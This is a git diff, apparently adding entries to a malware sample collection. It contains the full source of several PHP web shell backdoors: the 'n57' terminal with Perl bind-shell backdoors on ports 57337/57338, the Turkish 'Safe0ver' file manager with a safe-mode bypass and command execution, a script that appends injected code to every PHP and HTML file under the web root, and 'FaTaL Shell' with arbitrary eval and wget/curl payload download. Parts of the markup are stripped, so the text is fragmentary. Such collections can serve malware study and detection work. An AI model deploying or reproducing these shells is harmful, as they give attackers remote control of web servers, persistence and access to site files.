"; +include ($a.$b.$c); +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bq b/PHP/Backdoor.PHP.Agent.bq new file mode 100644 index 00000000..d61d810e --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bq @@ -0,0 +1,289 @@ + + + +PHP SHELL http-based-terminal - <? echo $dir?> + + +
+
+ + +Backdoor directory:   +
+n57http-based Terminal
+ +
+ + + + +::Exec command::
+
+ +
+ + +
+::File upload::
+
+
+ +
+
+::Encode to md5,base64,Des::
+
+- $chack -

"; + echo "MD5: "; echo md5("$chack"); echo "
"; + echo "Encode base64: "; echo base64_encode("$chack"); echo "
"; + echo "Decode base64: "; echo base64_decode("$chack"); echo "
"; + echo "DES: "; echo crypt("$chack"); echo "
"; + } +?> +
+ + +
+ +
+
::Fast CMD::

+
+
+::Edit/Create file::
+
+
+::Download file::
+
+ +
+
+
+
+
+ +Kernel: + +
+ID: +
+Dir:
+ +
+If SafeMode is On, then use this: + +
+ +&CLIENT\"); +open(STDOUT, \">&CLIENT\"); +open(STDERR, \">&CLIENT\"); +system(+system); +close(STDIN); +close(STDOUT); +close(STDERR); +} + +"; +############# C++ shell ######### +$cshell = " + +"; + +?> + +
+
+ +
+ +
+'; +if ($editpost == ""); else { +$editpost = str_replace("\\","",$editpost); +$fp = fopen($editfile, w); +fwrite($fp,"$editpost"); +print "
File $editfile edited/created success!
"; +print "
:: PHPshell.org http-based-terminal ::"; +print "
";exit; +} +;} +?> + +
+ +Run backdoor on port 57337 + +
[Perl]
+
+ + + + +Run backdoor on port 57338
Soon [C++] +
+
PHPshell.org http-based-terminal v1.0 ";?> +'; +?> diff --git a/PHP/Backdoor.PHP.Agent.br b/PHP/Backdoor.PHP.Agent.br new file mode 100644 index 00000000..01c4c2c6 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.br @@ -0,0 +1,939 @@ +=4); +$scriptTitle = "Safe0ver"; +$scriptident = "$scriptTitle By Evilc0der.com"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "7 Subat 2007"; +$scriptver = "Bet@ Versiyon"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "\"$id\""; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "$display"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= " "; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + + + + + + <?php echo $SFileName ?> + + + +
+ + + + +
+ - - +
+ + + + +

+ + ".sp(3)."\n\n\n\n + Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.
".sp(3)."\n + Script Gecisi Tamamlayamadi! +

".sp(3)."\n + Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz... +

\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> +
" method="POST"> + + + + +
+
 Safe0ver-Server File Browser... 
+
+
+ + + + + +
+  Listeliyor:  + + + + + + +
 GiT 
+ +
+ + + + + + + + + + $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* */ + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + /* */ + echo ""; + echo "\n"; + + } + else { /* */ + /* */ + if ( @is_readable("$dir/$file") ) + echo "\n"; + else + echo "\n"; + /* */ + echo "\n"; + /* */ + echo "\n"; + + /* */ + echo "\n"; + /* */ + echo ""; + echo "\n"; + } + } + + echo "
+  Dosya Adi  + +  Yapilabilecekler   + +  Boyut  + +  Yetkiler  + +  Son Düzenleme  +
".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
".sp(2)."\n"; + /* */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* */ + echo "  
   \n"; + echo "D"; + if ( @is_readable("$dir/$file") ) { + echo "R"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "W"; + } + } + else { + echo "(W)"; + } + if ( @is_executable("$dir/$file") ) { + echo "X"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
".sp(3).$file.sp(9)."
  \n"; + /* */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* */ + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* */ + echo sp(2)."
\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "  ".formatsize($size).""; + } + else + echo "  0 B"; + echo "    \n"; + + if ( @is_readable("$dir/$file") ) + echo "R"; + if ( @is_writeable("$dir/$file") ) + echo "W"; + if ( @is_executable("$dir/$file") ) + echo "X"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "U"; + } + else { + echo "(U)"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
\n\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "| $a - $b |"; + else + echo "| $a - $b |"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo ""; + } + + + echo "
\n"; + echo "  ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya  \n"; + echo "\n"; + echo "  Toplam Dosya Boyutu: ".formatsize($filesizes)."  
Page:
"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "   "; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "
\n
"; + + if ($isGoodver) { + echo "\n"; + } + else { + echo "\n"; + } + /* */ + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo ""; + echo "
 PHP Versiyonu:    $PHPVer 
 Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
 Diger Islemler:    ".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
 Script Location:    $PATH_TRANSLATED
 IP Adresin:    $REMOTE_ADDR 
 Bulundugun Klasör:   $partdir 
 Semboller:  \n"; + echo ""; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "
D:  Klasör.
R:  Okunabilir.
W:  Yazilabilir.
X:  Komut Calistirilabilir.
U:  HTTP Uploaded File.
"; + echo "
"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/**/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /* */ + echo "
"; +} + elseif ( $cmd=="delfile" ) { /* */ echo "
" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"
"; + } + echo ""; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? +
+ + + + + +
+
+ + +
"; + } + echo "
"; +} +elseif ( $cmd=="newfile" ) { /* */ + echo "
" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"
"; + } + else { + echo "Successfully removed \"$file\"
"; + } + echo "
"; + } + else { + echo "Are you sure you want to delete \"$file\" ? +
+ + + + + + +
+
+ + +
"; + } + echo "
"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...
"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; + echo " +
+ + + +
+
"; + } +elseif ( $cmd=="newdir" ) { /* */ + echo "
" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...
"; + else + echo "Successfully created: \"$lastdir/newdir$i\"
"; + echo "
+ + + +
"; +} +elseif ( $cmd=="edit" ) { /* */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "
"; + echo "M
\n"; + echo "\n"; + echo "EDIT FILE: $file
\n"; + echo "
\n"; + echo "\n"; + echo ""; + echo "
"; + echo "
"; +} +elseif ( $cmd=="saveedit" ) { /* */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /* */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* */ + ?> +
+ + + + +
+ Dosya Yükleme Sekmesine Tikladiniz ! +
Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.

+
" method="post"> + + + + + + Dosya Yükle:
+
+ +
+
+
" method="POST"> + + + +
+
+
+ + */ + echo "
"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; + if ($res) { + echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n

"; + echo "Yüklenen Dosya Adi: \"$userfile_name\".\n
Dosya Adi: \"$userfile\".\n
"; + echo "Dosya Boyutu: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; + } + else { + echo "Yüklenemedi..."; + } + echo "
" ; + echo "

"; +} +elseif ( $cmd=="file" ) { /* */ + echo "
"; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."
\n"; + } + echo "
"; +} +elseif ( $cmd=="ren" ) { /* */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "
 Rename a file: 

\n"; + If (empty($newfile) != true) { + echo "
"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...

\"$olddir$newfile\"

Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "
" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "
\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "Rename \"$oldfile\" to:
\n"; + echo "
"; + echo "
"; + echo "
"; + } +} +else if ( $cmd == "con") { + +?> +
+ + +
 
+ */ + $isMainMenu = true; + ?> + + + + +
+
 -<[{ Main Menu }]>- 
+
+
+
+ + + + + +
+ ##Safe0ver##", "cmd=dir&dir=.").sp(2); ?> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.

--------------------------

Bypass Kullaným:Cat /home/evilc0der/public_html/config.php Gibi Olmalidir.
+

+


Safe Mode ByPAss

+

" name="dizin"> +

+
+
+

+
+------------------------------------------------------------------------------------

+$safemodgec"; +} +?> +

+
+ + + + + + +
+
+   [ Main Menu ] ", "cmd=&dir="); ?>   +      +   [ R00T ] ", "cmd=dir&dir=."); ?>    +
+
+
+ + + + + +
+
  - -  
+
+
+ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bs b/PHP/Backdoor.PHP.Agent.bs new file mode 100644 index 00000000..e9c3bafc --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bs @@ -0,0 +1,76 @@ +"; +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +$free = disk_free_space($dir); +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ +if (!is_numeric($size)) {return FALSE;} +else +{ +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; +}} +if(!isset($_SERVER['DOCUMENT_ROOT'])) +{ +$n = $_SERVER['SCRIPT_NAME']; +$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]); +$f = str_replace('//','/',$f); +$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f); +} +$codigo = "\n"; +$directorio = $_SERVER['DOCUMENT_ROOT']; + +foreach (glob("$directorio/*.php") as $archivo) { +$fp=fopen($archivo,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.htm") as $archivh) { +$fp=fopen($archivh,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.html") as $archivl) { +$fp=fopen($archivl,"a+"); +fputs($fp,$codigo); +} +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ca b/PHP/Backdoor.PHP.Agent.ca new file mode 100644 index 00000000..a3e54452 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ca @@ -0,0 +1,301 @@ + +$v){$_POST[$k] = stripslashes($v);}} +@ini_set('max_execution_time',0); +(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)"); + +(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); +(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); +$version='version 1.0 by FaTaLErrOr'; +$action=$_POST['action']; +$file=$_POST['file']; +$dir=$_POST['dir']; +$content=''; +$stdata=''; +$style=''; +$header=''.getenv("HTTP_HOST").' - FaTaL Shell v1.0'.$style.''; +$footer=''; + +$lang=array( +'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.', +'uploadok'=>'Baþarýyla Yüklendi.', +'dircrt'=>'Klasör Oluþturuldu.', +'dontlist'=>'Listelenemiyor Ýzin Yok.', +'dircrterr'=>'Oluþturulamýyor Ýzin Yok.', +'dirnf'=>'Dizin Bulunamadi.', +'filenf'=>'.', +'dontwrdir'=>'Sadece Okunabilir.', +'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.', +'deletefileok'=>'Dosya Silindi.', +'deletedirok'=>'Klasör Silindi.', +'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi', +'cantrfile'=>'Dosya Açýlamýyor izin Yok.', +'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..', +'workdir'=>'Çalýþma Dizini: ', +'fullacc'=>'Full Yetki.', +'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.', +'thisnodir'=>'Klasör Seçin.', +'allfuncsh'=>'Fonksiyoýnlar Kapalý.' +); + +$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions + +function test_file($file){ +if(!file_exists($file))$err="1"; +elseif(!is_file($file)) $err="2"; +elseif(!is_readable($file))$err="3"; +elseif(!is_writable($file))$err="4"; else $err="5"; +return $err;} + +function test_dir($dir){ +if(!file_exists($dir))$err="1"; +elseif(!is_dir($dir)) $err="2"; +elseif(!is_readable($dir))$err="3"; +elseif(!is_writable($dir))$err="4"; else $err="5"; +return $err;} + +function perms($file){ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info;} + +function view_size($size){ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size;} + +if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; + +if(isset($dir)){ + $ts['test']=test_dir($dir); + switch($ts['test']){ + case 1:$stdata.=$lang['dirnf'];break; + case 2:$stdata.=$lang['thisnodir'];break; + case 3:$stdata.=$lang['dontlist'];break; + case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; + case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} +}else $dir=@chdir($dir); + +$dir=getcwd()."/"; +$dir=str_replace("\\","/",$dir); + +if(isset($file)){ + $ts['test1']=test_file($file); + switch ($ts['test1']){ + case 1:$stdata.=$lang['filenf'];break; + case 2:$stdata.=$lang['isdontfile'];break; + case 3:$stdata.=$lang['cantrfile'];break; + case 4:$stdata.=$lang['onlyracc'];$file=$file;break; + case 5:$stdata.=$lang['fullacc'];$file=$file;break;} +} + +function shell($cmd) +{ + global $lang; + $ret = ''; + if (!empty($cmd)) + { + if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} + elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} + else $ret=$lang['allfuncsh']; + } + return $ret; +} + +function createdir($dir){mkdir($dir);} + +//delete file +if($action=="delete"){ +if(unlink($file)) $content.=$lang['deletefileok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//delete dir +if($action=="deletedir"){ +if(!rmdir($file)) $content.=$lang['empty']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +else $content.=$lang['deletedirok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//shell +if($action=="shell"){ +$content.="
+ +
+
+
";} +//editor +if($action=="editor"){ + $stdata.="
+ + + Dosyanýn Adý (Full Url Yazýn)
"; + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); +} + function readf($file){ + clearstatcache(); + $f=fopen($file, "r"); + $contents = fread($f,filesize($file)); + fclose($f); + return htmlspecialchars($contents); +} +if(@$_POST['save'])writef($file,$_POST['data']); +if(@$_POST['create'])writef($file,""); +$test=test_file($file); +if($test==1){ +$content.="
+ +File name:
+ +
"; +} +if($test>2){ +$content.="
+ + +
+
"; +}} +//viewer +if($action=="viewer"){ +$content.=""; +$content.=""; + if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + if ($GLOBALS['os']==1) { + $content.=""; + } + $content.=""; + for($i=0;$i'.$dire[$i].''; + } + for($i=0;$i'.$files[$i].'
'; + } + $content.="
Klasore Git:
HDD Secin:"; + for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + $content.=' '.chr($j).''; + $content.="
Sistem: ".@php_uname()."
BiçimBoyutizinSeçenekler
Klasor'.perms($link).'X
Dosya'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
"; +}}} +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file);} +//phpeval +if($action=="phpeval"){ +$content.="
+ + + <?php
+
+ ?>
+
"; +if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} +//upload +if($action=="upload"){ + if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; + $form_win="
+ + Buraya Uploadla:Dosyayý Adlandýr (Gerekli) :"; + if($os==1)$content.=$form_win; + if($os==0){ + $content.=$form_win; + $content.='File addres: +
'; +} + +if(isset($_POST['uploadloc'])){ +if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else +$uploadfile = $dirupload."/".$_POST['filename']; + +if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} +if(file_exists($uploadfile))$content.=$lang['filext']; +elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) +$content.=$lang['uploadok']; +} + +if(isset($_POST['upload'])){ + if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) + switch($_POST['with']) + { + case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; + case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; + case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; + case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; +}}} +//end function +?> + + +

FaTaLSheLL v1.0

+
| Shell | Ana Sayfa| Dosya Editle| Dosya Upload| Php Eval | <-Geri | Ýleri->|

+

 

+ +
Safe mode:
+ Fonksiyon Kýsýtlamasý:
+ Sistem:
+ Durum:
COPYRIGHT BY StarHack.oRg
+ + + + + + + + + + + diff --git a/PHP/Backdoor.PHP.Agent.cb b/PHP/Backdoor.PHP.Agent.cb new file mode 100644 index 00000000..bb6f9cd2 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.cb @@ -0,0 +1,614 @@ + ";print"
$delmtxt
